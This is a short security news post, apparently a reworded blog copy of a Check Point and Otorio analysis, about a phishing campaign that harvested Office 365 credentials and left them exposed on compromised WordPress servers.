HomesecurityMicrosoft Office 365 employee passwords leaked online!

Microsoft Office 365 employee passwords leaked online!

A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to more than a thousand corporate employees.

The cyber-attack is said to have taken place in August last year, targeting energy and construction companies, Check Point Research researchers said today in a joint analysis with industrial security company Otorio.

Microsoft Office 365 phishing credentials

Although phishing campaigns designed to steal credentials are among the most common reasons for data breaches, what makes this mode to stand out is a functional failure that led hackers to inadvertently expose the credentials they had stolen on Internet.

"With a simple Google search, anyone could find the password of a compromised email," the researchers said.

The attack started with phishing supposedly Xerox (or Xeros) scan alerts containing an attachment HTML file, which when opened, encouraged them users to enter their Office 365 passwords on a fake login page. The passwords were then extracted and sent to one remote server in a text file.

The researchers noted that the JavaScript code for exfiltrating of credentials was constantly corrected and refined to the point of avoiding most antivirus and creating a "realistic" user experience to victims provide their login details.

To this end, the campaign was based on a combination of specialized infrastructure, as well as compromised servers WordPress used by attackers to store credentials.

The fact that stolen credentials were stored in specific text files on these servers also means that search engines like Google can register these pages and make them accessible to anyone malicious looking for stolen passwords with an easy search.

In addition, by analyzing the different email headers used in this campaign, the researchers came up with the conclusion that the emails were sent from a Linux server hosted on the Microsoft Azure platform.

To mitigate these threats, users are advised to be wary of emails received from unknown senders and not to click on suspicious links.

Source of information:


Please enter your comment!
Please enter your name here

Teo Ehc
Teo Ehc
Be the limited edition.